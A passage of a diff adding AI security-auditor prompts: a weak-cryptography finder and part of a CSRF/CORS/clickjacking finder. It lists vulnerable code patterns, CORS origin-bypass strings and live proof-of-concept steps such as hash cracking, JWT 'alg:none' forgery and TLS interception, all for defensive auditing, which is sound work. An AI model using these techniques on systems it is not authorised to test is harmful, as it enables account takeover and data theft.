+  misuse, `OpenSSL::SSL::VERIFY_NONE`, Net::HTTP `verify_mode=`, `JWT.decode(t,
+  nil, false)` / `algorithm: 'none'`, `ActiveSupport::MessageEncryptor` with a
+  short/static key, `Digest::SHA256` used as a password KDF (no salt/stretch).
+- **Node/TS:** `crypto.createHash('md5'|'sha1')` for passwords,
+  `crypto.createCipheriv('aes-256-ecb'|'des'|'rc4', ...)`, fixed/zero IV buffer,
+  `Math.random()` for tokens/IDs/secrets, `crypto.randomBytes` good vs
+  `Math.random` bad, `rejectUnauthorized:false` / `NODE_TLS_REJECT_UNAUTHORIZED=
+  '0'`, `https.Agent({rejectUnauthorized:false})`, `jwt.verify(t, key, {
+  algorithms:['none']})` / `jwt.decode` used as verify, `jsonwebtoken` with a
+  weak/hardcoded secret, bcrypt rounds `< 10` / plain `pbkdf2` low iters.
+- **Python:** `hashlib.md5/sha1(pw)`, `Crypto.Cipher.DES`/`ARC4`/`AES.new(key,
+  AES.MODE_ECB)`, static `iv=b'\x00'*16`, `random.random()`/`random.randint`/
+  `random.choice` for tokens (vs `secrets`/`os.urandom`),
+  `ssl._create_unverified_context()` / `verify=False` (requests) /
+  `cert_reqs=ssl.CERT_NONE` / `check_hostname=False`, `jwt.decode(t,
+  verify=False)` / `options={'verify_signature':False}` / `algorithms=['none']`,
+  `hashlib.pbkdf2_hmac` low iters, Django `make_password` overridden to MD5.
+- **Go:** `crypto/md5`/`crypto/sha1`/`crypto/des`/`crypto/rc4` for security,
+  `cipher.NewCBCEncrypter` with a static IV / ECB-style block loop, `math/rand`
+  (incl. `rand.Seed(time.Now())`) for tokens/keys instead of `crypto/rand`,
+  `tls.Config{InsecureSkipVerify:true}`, custom `VerifyConnection`/
+  `VerifyPeerCertificate` that returns nil, `jwt.ParseWithClaims` accepting
+  `none`/no key check, ignored `x509` `Certificate.Verify` error.
+- **PHP:** `md5($pw)`/`sha1($pw)`/`crypt()` w/ DES, `mcrypt_*`,
+  `openssl_encrypt($d,'aes-256-ecb',...)` or `'des-ede3'`/`'rc4'`, fixed `$iv`,
+  `rand()`/`mt_rand()`/`uniqid()` for tokens (vs `random_bytes`/
+  `random_int`), `CURLOPT_SSL_VERIFYPEER=>false` / `CURLOPT_SSL_VERIFYHOST=>0`,
+  `'verify'=>false` (Guzzle), `password_hash` good vs raw hash, JWT libs with
+  `'none'`/HS256 confusion.
+- **Java:** `MessageDigest.getInstance("MD5"|"SHA-1")` for passwords,
+  `Cipher.getInstance("DES"|"RC4"|"AES/ECB/PKCS5Padding"|"AES")` (bare "AES" =
+  ECB), `new IvParameterSpec(new byte[16])` static IV, `new Random()` /
+  `Math.random()` for tokens (vs `SecureRandom`), custom `X509TrustManager` with
+  empty `checkServerTrusted`, `setHostnameVerifier((h,s)->true)` /
+  `ALLOW_ALL_HOSTNAME_VERIFIER`, `SSLContext` w/ trust-all, JWT `none`,
+  hardcoded `SecretKeySpec(literal.getBytes(), ...)`.
+- **Rust:** `md5`/`sha1`/`md-5` crates for secrets, `Des`/`Rc4`/ECB block modes,
+  `rand::thread_rng()` for tokens that need a CSPRNG (vs `rand::rngs::OsRng` /
+  `getrandom`), `danger_accept_invalid_certs(true)` /
+  `danger_accept_invalid_hostnames(true)` (reqwest), `rustls` `dangerous()` custom verifier
+  returning Ok, hardcoded key bytes, static `nonce`/`iv` arrays for `aes-gcm`/`chacha20`.
+
+## 3. Detection heuristics
+
+**Taint perspective.** This class is partly *parameter-driven* (the SOURCE is the
+crypto config/key/IV/RNG choice in the code, not always external input) and
+partly *flow-driven* (untrusted ciphertext/token/MITM position reaches a sink
+that fails to verify). Capture both in `source`/`sink`:
+
+- **SOURCE** = the data being protected and *who can reach or supply it*: a
+  password an attacker can offline-crack after a DB leak; a token an attacker
+  receives and must not be able to forge/predict; ciphertext/cookie the attacker
+  holds; a network position where the attacker can MITM the TLS client; the
+  attacker-supplied `alg`/header that a verifier trusts.
+- **SINK** = the weak crypto operation: the hash/cipher/mode/IV/RNG/verify call
+  that is broken or unverified.
+
+Vulnerable patterns to confirm (each needs a reachable SOURCE):
+
+- **Broken hash for passwords (CWE-916/328):** `MD5`/`SHA1`/`SHA-256`/`SHA-512`
+  used *directly* as a password store. Fast hashes (even SHA-256) are wrong for
+  passwords — they must use a memory-hard/iterated KDF (bcrypt/scrypt/argon2/
+  PBKDF2-high-iter). Reachable via any DB compromise → offline cracking. Confirm
+  the hash output is the stored credential and no KDF wraps it.
+- **Broken hash for integrity/signature (CWE-328):** MD5/SHA1 in an HMAC-less
+  "signature", a hand-rolled `hash(secret + msg)` (length-extension), or MD5
+  collision-relevant contexts.
+- **Broken/weak cipher (CWE-327):** DES, 3DES, RC4, Blowfish for new data; RSA
+  with PKCS#1 v1.5 in a padding-oracle-prone spot; export-grade params.
+- **ECB mode (CWE-327):** any `*-ECB` / bare `Cipher.getInstance("AES")`
+  (defaults to ECB) / manual block loop without chaining — identical plaintext
+  blocks leak as identical ciphertext blocks.
+- **Static / reused / predictable IV or nonce (CWE-329/330):** IV hardcoded
+  (`\x00`*16), derived from a constant, or reused across messages with the same
+  key. Catastrophic for CTR/GCM/ChaCha20 (nonce reuse breaks confidentiality and
+  enables forgery of authenticated messages) and weakens CBC.
+- **Static / missing salt, or fast unsalted hash (CWE-916/759/760):** one global
+  salt, no salt, or salt = username; enables rainbow-table / cross-account
+  cracking.
+- **Weak RNG for security (CWE-330/338):** `Math.random`, `rand`, `mt_rand`,
+  `random.random`, `math/rand`, `java.util.Random`, `time`-seeded RNG, or
+  incrementing/`uniqid`/timestamp values used to mint **session tokens,
+  password-reset tokens, API keys, IVs, salts, OTPs, CSRF tokens, or key
+  material**. Predictable → forgeable/guessable. (RNG for non-security shuffles/
+  jitter is fine.)
+- **Disabled TLS verification (CWE-295):** verification turned off on an outbound
+  client to a security-relevant peer — `verify=False`, `rejectUnauthorized:false`,
+  `InsecureSkipVerify:true`, `VERIFY_NONE`, trust-all `TrustManager`, hostname
+  verifier returning true, `danger_accept_invalid_certs`. Enables MITM →
+  credential/data theft, response forgery.
+- **Hardcoded / committed key, IV, or secret (CWE-321/798):** symmetric key,
+  HMAC/JWT secret, or private key as a string literal, default config value, or
+  committed file — anyone with source/binary can decrypt/forge. (If it's purely a
+  *secret leak* with no crypto-op context, that's the `secrets` finder; here the
+  point is the key feeding a crypto sink that's now defeated.)
+- **JWT alg/verify failures (CWE-327/347):** `alg:none` accepted, signature
+  verification skipped (`decode` used where `verify` is required), HS/RS
+  algorithm confusion (RSA public key used as HMAC secret), unconstrained
+  `algorithms` list, or symmetric secret that is weak/guessable.
+- **Bad key management (CWE-320/322):** key derived from a low-entropy
+  passphrase without a KDF, no separation between signing/encryption keys, key
+  reused as both IV and key, ECDH/RSA without authentication.
+
+## 4. Not-a-finding (false-positive guard) — check BEFORE flagging
+
+Do NOT report if any of these holds on the path:
+
+- **Correct password KDF in place:** `bcrypt`, `scrypt`, `argon2`/`argon2id`, or
+  `PBKDF2` with a sane iteration/cost (bcrypt cost ≥ 10/12, PBKDF2 ≥ ~100k iters,
+  argon2 default params) and a per-user salt. A plain SHA-256 you *thought* was
+  the store but is actually wrapped by `password_hash`/`bcrypt`/Devise/
+  `Argon2`/Django's `PBKDF2PasswordHasher` is safe — trace what's actually
+  persisted.
+- **Strong AEAD with unique nonce:** AES-GCM / ChaCha20-Poly1305 / AES-CBC+HMAC
+  (encrypt-then-MAC) where the IV/nonce is freshly generated per message from a
+  CSPRNG (`randomBytes`/`os.urandom`/`SecureRandom`/`crypto/rand`/`OsRng`). A
+  random per-message IV is correct even if the variable name is `iv` — verify
+  it's regenerated, not constant.
+- **Non-security use of weak primitive:** MD5/SHA1/CRC for cache keys,
+  ETags, content-addressing/dedup, checksums of non-adversarial data, file
+  fingerprints, sharding, bloom filters — **not** a finding (note it only if it
+  guards a trust decision). `Math.random` for UI jitter, A/B bucketing, retry
+  backoff, or non-secret IDs is fine. The bar is: does breaking it grant an
+  attacker anything?
+- **CSPRNG actually used:** the token/IV/salt comes from `crypto.randomBytes`,
+  `secrets.token_*`/`os.urandom`, `SecureRandom`, `crypto/rand`, `OsRng`,
+  `Random::Secure` — even if a weak RNG exists elsewhere in the file for
+  non-security purposes.
+- **TLS verification is on / toggle is unreachable:** `verify=False` etc. gated
+  behind a dev/test-only branch that cannot run in production (env guard you can
+  confirm), or pointed only at a localhost/test fixture, or the disable is in a
+  test file / mock. Confirm the branch is actually unreachable in prod before
+  dropping; if the toggle keys off an attacker- or operator-misconfigurable env
+  var that defaults insecure, it IS a finding.
+- **Key sourced from real secret management:** key/secret read from env, a
+  vault/KMS/HSM, or a runtime-injected config — not a literal. A literal that is
+  obviously a *placeholder/example* in a `.example`/test fixture with no prod
+  wiring is not a live finding (note it; it may be a `secrets` item).
+- **JWT verified correctly:** `verify` with a pinned algorithm allowlist that
+  matches the key type (RS256 with a public key, HS256 with a server secret),
+  `none` rejected, `kid`/issuer/audience checked. The mere presence of `decode`
+  is fine if a `verify` happens first.
+- **Legacy compatibility with a real migration/guard:** a weak verifier kept only
+  to *read* legacy records but rehashing/re-encrypting on next use, with no path
+  that lets an attacker force the weak path. Confirm the upgrade-on-verify exists.
+
+If a guard exists but is bypassable — bcrypt cost too low to matter, PBKDF2 with
+1k iters, AEAD whose nonce is actually a counter that resets, TLS verify gated on
+a header/param an attacker sets, JWT allowlist that still includes a confusable
+alg, "salt" that is constant — it is NOT a mitigation. Flag it and name the
+exact bypass in `sanitizers_checked`.
+
+## 5. Severity guidance
+
+- **Critical** — break yields direct, unauth, high-impact compromise: predictable
+  password-reset/session tokens from a weak RNG (account takeover); `alg:none`/
+  skipped JWT verification or HS/RS confusion (auth bypass / forge any token);
+  disabled TLS verification on a path carrying credentials or auth tokens to a
+  MITM-reachable peer; hardcoded key/secret that decrypts production data or
+  forges signatures for all users; nonce reuse on AES-GCM exposing plaintext or
+  enabling forgery of authenticated messages.
+- **High** — realistically-conditioned high impact: fast/unsalted password hash
+  (MD5/SHA1/raw-SHA256) — full offline cracking after any DB leak; ECB/DES/RC4 or
+  static IV protecting PII/secrets at rest that an attacker can obtain; weak RNG
+  for API keys behind authn; disabled TLS verify on an internal-but-sensitive
+  client.
+- **Medium** — constrained: weak crypto over data with limited sensitivity or
+  high attacker cost; static salt with an otherwise-strong KDF; weak RNG for a
+  token with short TTL + rate limiting; padding-oracle-prone construction needing
+  specific conditions; partial mitigation that raises but doesn't close the bar.
+- **Low/Info** — weak primitive in a non-security context, or theoretical with no
+  reachable SOURCE — usually downgrade or drop per §4. A committed example key
+  with no prod wiring → Info/`secrets`.
+
+## 6. Emit findings as
+
+One JSON object per distinct root cause (dedup call sites; list extras in
+`rationale`). Fields:
+
+```json
+{
+  "id": "crypto-001",
+  "title": "Unsalted SHA1 used as the password store — offline-crackable on DB leak",
+  "vuln_class": "crypto",
+  "owasp": "A04:2025",
+  "cwe": "CWE-916",
+  "asvs": "V11",
+  "severity": "high",
+  "status": "likely",
+  "confidence": "high",
+  "file": "app/models/user.py",
+  "line": 41,
+  "end_line": 43,
+  "code_excerpt": "self.password_hash = hashlib.sha1(password.encode()).hexdigest()",
+  "source": "user passwords for all accounts; attacker reaches them via any DB read/dump (SQLi, backup, insider) and cracks offline",
+  "sink": "hashlib.sha1(...).hexdigest() persisted as the credential — a single-pass fast hash, no salt, no key-stretching",
+  "data_flow": "password -> sha1() (one pass, no salt) -> users.password_hash column; verification recomputes the same sha1. No KDF/salt/cost between the password and the stored value.",
+  "sanitizers_checked": "no bcrypt/scrypt/argon2/PBKDF2 wrapper anywhere on set or verify; no per-user salt column; not Django make_password (raw hashlib); SHA1 is ~GH/s on commodity GPUs so cost factor is effectively zero",
+  "rationale": "Reachable for the entire user table the moment the DB leaks. Same pattern at admin.py:88 (admin reset). Single root cause: the hashing helper.",
+  "exploit_sketch": "Obtain users.password_hash (e.g. via the SQLi at report.py:71). hashcat -m 100 against the unsalted SHA1 list cracks weak/common passwords in minutes, recovering plaintext for credential reuse.",
+  "dynamic_poc_plan": "Register a user with a known password via the live signup endpoint; read the stored hash from the DB/test harness; show hashlib.sha1(known_pw) == stored value (proves no salt/KDF), then crack a second weak password with hashcat to demonstrate recovery.",
+  "proposed_fix": "Move password storage onto a memory-hard, salted KDF instead of a single-pass unsalted hash, so a DB leak no longer enables practical offline cracking. (High-level direction, not a patch — the implementing engineer chooses the KDF, parameters, and legacy-migration approach.)"
+}
+```
+
+Accuracy bar: `source`, `sink`, `data_flow`, and `sanitizers_checked` must be
+concrete and true. State explicitly *what is protected and who reaches it*
+(`source`), the *exact weak operation* with the real API name (`sink`), how the
+data reaches that operation and why the primitive/parameter is broken
+(`data_flow`), and which §4 mitigation is absent or, if present, the exact bypass
+(`sanitizers_checked`). A weak primitive with **no reachable thing it protects**
+is not a finding. Pick `cwe` by failure mode: 327 broken/weak algo or mode,
+328 weak hash, 916 unsalted/fast password hash, 326 inadequate strength,
+330/331/338 weak RNG/entropy, 329 static IV/nonce, 295/347 cert/signature
+verification. Use `status:"likely"` for a proven static trace, `"confirmed"`
+only after dynamic repro, `"triage"` if the protected SOURCE or reachability is
+uncertain.
+
+## 7. Dynamic PoC strategy
+
+Goal: prove the chosen primitive/parameter is actually broken and exploitable on
+the running system. Pick the oracle matching the failure mode:
+
+1. **Weak password hash.** Register/seed a user with a known password via the
+   live endpoint; extract the stored hash (DB, debug route, or test harness).
+   **Observed proof** = `weak_hash(known_pw [+salt])` reproduces the stored value
+   bit-for-bit (no KDF; salt absent or known/static), and a second weak password
+   cracks under `hashcat`/`john` with the matching mode — recovering plaintext.
+2. **Predictable token (weak RNG).** Trigger many token mints (signup, password
+   reset, API-key create) and capture the values. **Observed proof** = tokens are
+   sequential/correlated, or — given the seed source (PID/time) — you predict the
+   next token and use it to claim another user's reset/session, completing an
+   account takeover against the live app.
+3. **ECB / static IV / nonce reuse.** Submit two plaintexts with identical
+   blocks (or the same plaintext twice) through the encrypt endpoint and capture
+   ciphertext. **Observed proof** = identical plaintext blocks yield identical
+   ciphertext blocks (ECB), or two messages share the IV/nonce (CTR/GCM reuse) —
+   then recover XOR of plaintexts / forge a GCM tag to demonstrate decryption or
+   forgery.
+4. **Disabled TLS verification.** Point the client at a host you control with a
+   self-signed/mismatched cert (DNS override, `/etc/hosts`, or a proxy like
+   mitmproxy). **Observed proof** = the client completes the request against the
+   bad cert (no error), and you capture/alter the plaintext payload (e.g. the
+   credentials/token it sent) — proving MITM.
+5. **JWT alg/verify failure.** Take a valid token, set header `alg:none` and
+   strip the signature, or sign with the public key as an HMAC secret (HS/RS
+   confusion), or forge with the hardcoded/guessed secret. **Observed proof** =
+   the live app accepts the forged token (returns the victim's data / an
+   authenticated session) — impossible if verification were correct.
+6. **Hardcoded key.** Use the literal key from source to decrypt a captured
+   ciphertext/cookie or forge a valid signed token, then replay it. **Observed
+   proof** = the app accepts the forged/decrypted artifact as authentic.
+
+Record the exact payload/command and observed evidence in the `Repro` object
+(`reproduced`, `method:"live-exploit"`, `poc`, `observed`, `impact`). A
+reproduced forgery/decryption/MITM or a bit-for-bit weak-hash match proves the
+class — set `method:"live-exploit"`. If the app can't be run, fall back to a
+focused unit test that drives the crypto helper and asserts the broken property
+(ECB block equality, static IV, hash without salt, `verify` accepting a forged
+token) — `method:"unit-test"`.
diff --git a/plugins/security/prompts/finders/csrf-cors.md b/plugins/security/prompts/finders/csrf-cors.md
new file mode 100644
index 0000000..ace849f
--- /dev/null
+++ b/plugins/security/prompts/finders/csrf-cors.md
@@ -0,0 +1,346 @@
+<!--
+FINDER PROMPT — csrf-cors. You are a fresh-context auditor hunting ONE class:
+CSRF, CORS & Clickjacking. Read the target's code & config; emit finding objects.
+Signal discipline (AGENTS.md) is binding: only a REACHABLE cross-origin attack
+path — a state-changing request a foreign site can forge, a credentialed CORS
+response a foreign origin can read, or a sensitive view a foreign page can frame
+— with no effective guard on the path is a finding. No generic header-hardening
+checklists, no defense-in-depth musings without a concrete sink, no dead code,
+no posture/process items.
+-->
+
+# Finder — CSRF, CORS & Clickjacking (csrf-cors)
+
+**Class key:** `csrf-cors` · **OWASP:** A01:2025 · **CWE:** CWE-352, CWE-1021, CWE-942 · **ASVS:** V3
+
+## 1. Objective
+
+Find state-changing endpoints that a foreign web origin can drive on a
+logged-in victim's behalf — via a forged cross-site request (no anti-CSRF
+token / no SameSite cookie), a permissive CORS policy that lets an attacker
+origin read credentialed responses, or a missing framing defense that allows
+clickjacking of a sensitive action.
+
+## 2. Where to look
+
+The attack target is the **ambient-credential boundary**: any endpoint
+authenticated by a cookie/session, HTTP Basic, or a client TLS cert that the
+browser attaches automatically on cross-site requests. Bearer tokens read from
+JS-controlled storage (`Authorization: Bearer`) are NOT auto-attached, so they
+are generally CSRF-immune — confirm the auth mechanism before flagging.
+
+Entry points / surfaces:
+
+- **State-changing routes:** `POST`/`PUT`/`PATCH`/`DELETE` handlers, but also
+  `GET` handlers that mutate (logout, "delete via link", `/transfer?to=...`,
+  toggle/enable/disable, admin actions). GET-that-mutates is forgeable with a
+  bare `<img>`/`<link>`.
+- **Global CSRF config:** the framework's CSRF middleware enable/disable site,
+  and per-route/per-controller `skip`/`exempt` annotations. The bug is usually
+  the *exemption*, not the absence.
+- **Cookie/session setup:** where the session cookie is issued — its
+  `SameSite`, `Secure`, `HttpOnly` attributes drive cross-site
+  exploitability.
+- **CORS config:** middleware/handlers that set `Access-Control-Allow-Origin`
+  (ACAO), `-Allow-Credentials` (ACAC), `-Allow-Methods`, `-Allow-Headers`,
+  `-Expose-Headers`; reflected-origin logic; preflight (`OPTIONS`) handlers.
+- **Framing/headers:** where `X-Frame-Options` / CSP `frame-ancestors` are
+  set (or globally not set) for sensitive pages (login, OAuth consent, fund
+  transfer, account settings, admin).
+- **Cross-origin message channels:** browser `window.postMessage` handlers
+  (`message` event listeners) that act on data without checking
+  `event.origin` — a CSRF-adjacent cross-origin sink.
+
+Route/handler & config signals to grep:
+
+- **Crystal:** Lucky `protect_from_forgery`, Amber `CSRF` pipe / `csrf_token`,
+  Kemal — *no built-in CSRF*, so cookie-auth Kemal apps are bare unless they
+  roll their own; `Access-Control-Allow-Origin` header writes via
+  `context.response.headers`.
+- **Ruby/Rails:** `protect_from_forgery`, `skip_before_action
+  :verify_authenticity_token`, `skip_forgery_protection`,
+  `protect_from_forgery with: :null_session`, `config.action_controller
+  .forgery_protection_origin_check`, `Rack::Cors` `allow do origins ...`,
+  Sinatra `Rack::Protection` (and `Rack::Protection` *disabled*).
+- **Node/TS:** `csurf`/`csrf-csrf`/`@fastify/csrf-protection` (presence &
+  exemptions); `cors` package `origin: true`/`origin: '*'` with
+  `credentials: true`; manual `res.setHeader('Access-Control-Allow-Origin',
+  req.headers.origin)`; `helmet` framing config; Express session cookie
+  `sameSite`.
+- **Python:** Django `@csrf_exempt`, `CsrfViewMiddleware` removed from
+  `MIDDLEWARE`, `CSRF_TRUSTED_ORIGINS`, `CORS_ALLOW_ALL_ORIGINS`/
+  `CORS_ORIGIN_ALLOW_ALL`, `CORS_ALLOWED_ORIGIN_REGEXES`,
+  `CORS_ALLOW_CREDENTIALS`, `django-cors-headers`; Flask `flask-wtf`
+  `CSRFProtect` (presence) / `WTF_CSRF_ENABLED=False` / `@csrf.exempt`,
+  `flask-cors` `CORS(app, ...)`; `SESSION_COOKIE_SAMESITE`,
+  `X_FRAME_OPTIONS`/`SecurityMiddleware`, FastAPI `CORSMiddleware
+  allow_origins=["*"], allow_credentials=True`.
+- **Go:** `rs/cors` `AllowedOrigins: []string{"*"}` + `AllowCredentials: true`
+  or `AllowOriginFunc: func(o string){ return true }`; gin
+  `cors.Config{AllowAllOrigins:true}`; manual
+  `w.Header().Set("Access-Control-Allow-Origin", r.Header.Get("Origin"))`;
+  most Go routers have *no* CSRF by default — look for `gorilla/csrf`,
+  `nosurf`; `http.SetCookie` SameSite field.
+- **PHP:** Laravel `VerifyCsrfToken` `$except` array / `csrf_field()`;
+  Symfony `csrf_protection: false` / `is_csrf_token_valid`; raw apps with no
+  token at all; `header("Access-Control-Allow-Origin: " . $_SERVER
+  ['HTTP_ORIGIN'])`, `header("Access-Control-Allow-Credentials: true")`.
+- **Java:** Spring Security `.csrf().disable()` /
+  `csrf(AbstractHttpConfigurer::disable)` / `.ignoringRequestMatchers(...)`;
+  `CorsConfiguration.setAllowedOrigins(List.of("*"))` /
+  `addAllowedOriginPattern("*")` + `setAllowCredentials(true)`;
+  `@CrossOrigin(origins="*", allowCredentials="true")`;
+  `setAllowedOriginPatterns` with `*`; framing via
+  `headers().frameOptions().disable()`.
+- **Rust:** `actix-cors` `Cors::permissive()` / `allow_any_origin()` +
+  `supports_credentials()`; `tower-http` `CorsLayer::permissive()` /
+  `AllowOrigin::any()` / `AllowOrigin::mirror_request()` +
+  `allow_credentials(true)`; most Rust frameworks have *no* CSRF
+  middleware — cookie-auth handlers are bare unless a token scheme is rolled.
+
+## 3. Detection heuristics
+
+**Taint SOURCES** (untrusted / attacker-controlled): the *cross-site request*
+itself (forced by attacker HTML/JS from another origin while the victim is
+logged in) and, for CORS, the attacker-chosen `Origin` request header
+reflected into a response header. For postMessage, the cross-origin message
+`event.data`. The "input" here is the request's *provenance*, not a parameter
+value — the question is whether a foreign origin can issue/read it.
+
+**Taint SINKS** (dangerous op):
+- **CSRF:** a state-changing handler (DB write, money/permission/account
+  mutation, OS/admin action) reachable with **ambient credentials** and **no
+  unguessable token tied to the session** required.
+- **CORS:** writing `Access-Control-Allow-Origin` to a value derived from /
+  equal to the request `Origin`, **together with**
+  `Access-Control-Allow-Credentials: true` — letting the attacker origin's JS
+  read the credentialed response body.
+- **Clickjacking:** rendering a sensitive, state-changing UI with **no**
+  `X-Frame-Options: DENY/SAMEORIGIN` and **no** CSP `frame-ancestors`.
+- **postMessage:** acting on `event.data` (navigation, token relay, state
+  change) without validating `event.origin` against an allowlist.
+
+Vulnerable patterns to confirm:
+
+- **CSRF protection disabled / exempted on a mutating, cookie-auth route:**
+  - Rails: `skip_before_action :verify_authenticity_token` (or
+    `protect_from_forgery with: :null_session`) on a controller that writes.
+  - Django: `@csrf_exempt` on a `POST` view that mutates; or
+    `CsrfViewMiddleware` absent from `MIDDLEWARE`.
+  - Flask: app uses session cookies but no `CSRFProtect`/`flask-wtf`, or
+    `@csrf.exempt` / `WTF_CSRF_ENABLED=False`.
+  - Spring: `http.csrf(csrf -> csrf.disable())` while `formLogin`/session
+    cookies are in use.
+  - Laravel: route/path listed in `VerifyCsrfToken::$except`.
+  - Go/Rust/Kemal: cookie-session app with **no token scheme present at all**
+    on mutating handlers.
+- **GET that mutates:** `get "/account/delete"`, `app.get('/logout', ...)` that
+  ends a session or writes — forgeable with a plain `<img src>` regardless of
+  token middleware (which typically only guards unsafe methods).
+- **Reflected-origin CORS with credentials:** ACAO set to the request Origin
+  (or `*` paired with credentials — invalid per spec, but some stacks coerce it
+  into a reflected origin) and ACAC `true`:
+  - Node: `res.setHeader('Access-Control-Allow-Origin', req.headers.origin);
+    res.setHeader('Access-Control-Allow-Credentials','true')`.
+  - Express `cors`: `cors({ origin: true, credentials: true })` (reflects any
+    origin).
+  - Go: `w.Header().Set("Access-Control-Allow-Origin", r.Header.Get("Origin"))`
+    + `...Allow-Credentials","true"`.
+  - PHP: `header("Access-Control-Allow-Origin: {$_SERVER['HTTP_ORIGIN']}");
+    header("Access-Control-Allow-Credentials: true");`.
+  - Spring: `@CrossOrigin(origins = "*", allowCredentials = "true")` or
+    `config.setAllowedOriginPatterns(List.of("*"))` +
+    `setAllowCredentials(true)`.
+  - FastAPI/Starlette: `allow_origins=["*"], allow_credentials=True`
+    (Starlette silently mirrors the origin in this combo).
+  - Rust: `Cors::permissive().supports_credentials()` /
+    `CorsLayer::very_permissive()` (mirrors the origin and allows credentials).
+- **Sloppy origin allowlist (bypassable):** origin check by substring/prefix/
+  suffix or unanchored regex:
+  - `origin.endsWith("trusted.com")` → `https://nottrusted.com` or
+    `https://evil-trusted.com` (any attacker domain ending in the string).
+  - `origin.startsWith("https://trusted.com")` →
+    `https://trusted.com.evil.com`.
+  - `origin.includes("trusted.com")` → `https://trusted.com.evil.com`.
+  - regex `/trusted.com/` (no anchors, unescaped `.`) → matches
+    `trustedxcom.evil.com`, `eviltrusted.com`.
+  - reflecting `null` origin (`Allow-Origin: null`) — reachable from sandboxed
+    iframes / `data:` documents the attacker controls.
+- **Missing framing defense on sensitive pages:** no `X-Frame-Options` and no
+  `frame-ancestors` on login / OAuth-consent / transfer / settings / admin
+  pages, where a framed UI + a transparent overlay tricks the victim into
+  clicking a real button (clickjacking). Pair with a state-changing action to
+  be a finding, not a bare missing header.
+- **postMessage without origin check:**
+  `window.addEventListener('message', e => { /* uses e.data, no e.origin
+  check */ })` — a foreign frame can drive the handler.
+
+## 4. Not-a-finding (false-positive guard) — check BEFORE flagging
+
+Do NOT report if any of these is present AND effective on the path:
+
+- **No ambient credentials on the route.** If the endpoint authenticates only
+  via an `Authorization: Bearer`/JWT/API-key header read from JS (not a cookie,
+  not Basic, not client cert), a cross-site page cannot attach it → no CSRF.
+  Likewise an endpoint that requires no auth and exposes no per-user state is
+  not a CSRF target. Confirm the actual auth mechanism in code.
+- **Effective anti-CSRF token** present and verified on every unsafe method:
+  framework default (Rails `protect_from_forgery` active, Django
+  `CsrfViewMiddleware` enabled + `{% csrf_token %}`, Spring `csrf()` default,
+  Laravel `VerifyCsrfToken` not exempting the route, flask-wtf `CSRFProtect`
+  active) — a synchronizer/double-submit token bound to the session and
+  unguessable. A double-submit cookie counts only if the token cookie is
+  `__Host-`/`SameSite` and the server compares header-vs-cookie.
+- **`SameSite=Lax` or `Strict` session cookie, set explicitly** (and the route
+  is *not* a top-level GET navigation for `Lax`). Lax blocks cross-site POST
+  cookie attachment, leaving only top-level `GET` navigations as CSRF surface.
+  Do not rely on the browser default: only Chromium defaults to Lax (with a
+  ~2-minute Lax+POST grace window), while Firefox/Safari may still send the
+  cookie. State-changing GETs remain forgeable under Lax; Strict blocks those.
+- **Origin/Referer validation done correctly** on unsafe methods: parse the
+  `Origin` (or `Referer`) header and **exact-match** against a closed allowlist
+  of full origins (scheme+host+port) — Rails `forgery_protection_origin_check`,
+  a hand-rolled `Origin == "https://app.example.com"` check. Anchored,
+  fully-escaped regex matching a closed set also counts.
+- **CORS that is safe by construction:**
+  - ACAO is a **static, closed allowlist** of exact origins (not the reflected
+    request origin, not `*`), each compared by equality; OR
+  - ACAO is `*` **with credentials NOT enabled**
+    (`Access-Control-Allow-Credentials` absent/false) — browsers refuse to
+    expose a credentialed response under `*` (the two cannot be combined), so
+    no credentialed read; the response is treated as public anyway. Only a
+    finding if the data behind it is meant to be private and is in fact served
+    (then it is an access-control issue, flag under that class); OR
+  - the response carries **no credentials and no sensitive data** (truly public
+    API). CORS only governs *reading* the response — it never bypasses CSRF
+    protections for *writing*, so a permissive CORS policy on a token-protected,
+    non-credentialed endpoint is not exploitable here.
+- **Framing defense present:** `X-Frame-Options: DENY`/`SAMEORIGIN` **or** CSP
+  `frame-ancestors 'none'`/`'self'`/closed allowlist covering the sensitive
+  page. Either one suffices; do not flag a missing `X-Frame-Options` if
+  `frame-ancestors` is set (and vice-versa). Non-sensitive, non-state-changing
+  pages (marketing, docs) being frameable is not a finding.
+- **postMessage handler validates `event.origin`** against an allowlist before
+  acting (and ideally checks `event.source`).
+- **Method genuinely safe & side-effect-free:** a `GET`/`HEAD` that only reads
+  is not a CSRF sink (reading via forged request yields nothing the attacker
+  can see cross-origin unless CORS leaks it — which is the CORS finding, not
+  CSRF).
+
+If a guard exists but is bypassable (token not actually verified, exemption on
+a mutating route, substring/unanchored-regex origin check, reflected origin with
+credentials, `SameSite=None` without a token, an `X-Frame-Options` value that is
+duplicated/invalid and so ignored by browsers, `frame-ancestors` with a wildcard),
+it is NOT a mitigation — flag it and name the exact bypass in `sanitizers_checked`.
+
+## 5. Severity guidance
+
+- **Critical** — forgeable/cross-origin-readable path to a full account or
+  privilege takeover with realistic preconditions: CSRF on
+  change-password/change-email/add-admin/disable-2FA/create-API-key with no
+  token and no SameSite, OR reflected-origin-with-credentials CORS exposing
+  session/admin data or a CSRF-token-bearing response (which then unlocks
+  further CSRF). Unauthenticated-to-admin or one-click account takeover.
+- **High** — CSRF on a significant but not total-takeover action (fund
+  transfer, data deletion, permission change, settings mutation) on a
+  cookie-auth route with a bypassable/absent token; or credentialed CORS with a
+  bypassable origin allowlist (substring/regex) exposing per-user data; or
+  clickjacking of a single-click sensitive state change (delete account,
+  authorize OAuth, transfer).
+- **Medium** — CSRF/CORS where exploitation needs unusual conditions or yields
+  limited impact: SameSite=Lax present so only a state-changing top-level GET
+  is forgeable; CORS leaks non-critical per-user data; clickjacking requiring
+  multi-step drag/social engineering; `null`-origin-only CORS reflection.
+- **Low/Info** — missing framing header on a sensitive-but-not-mutating page,
+  `*` CORS without credentials on a non-sensitive endpoint, or a
+  defense-in-depth gap with no demonstrable cross-origin action. Usually an
+  Info-appendix note, not a body finding.
+
+Note in `rationale` whether the action is one-click vs. multi-step and whether
+auth is required, since that drives the severity.
+
+## 6. Emit findings as
+
+One JSON object per distinct root cause (dedup call sites / shared config;
+list extras in `rationale`). Fields:
+
+```json
+{
+  "id": "csrf-cors-001",
+  "title": "Reflected-origin CORS with credentials exposes authenticated /api/account to any origin",
+  "vuln_class": "csrf-cors",
+  "owasp": "A01:2025",
+  "cwe": "CWE-942",
+  "asvs": "V3",
+  "severity": "critical",
+  "status": "likely",
+  "confidence": "high",
+  "file": "src/middleware/cors.ts",
+  "line": 11,
+  "end_line": 14,
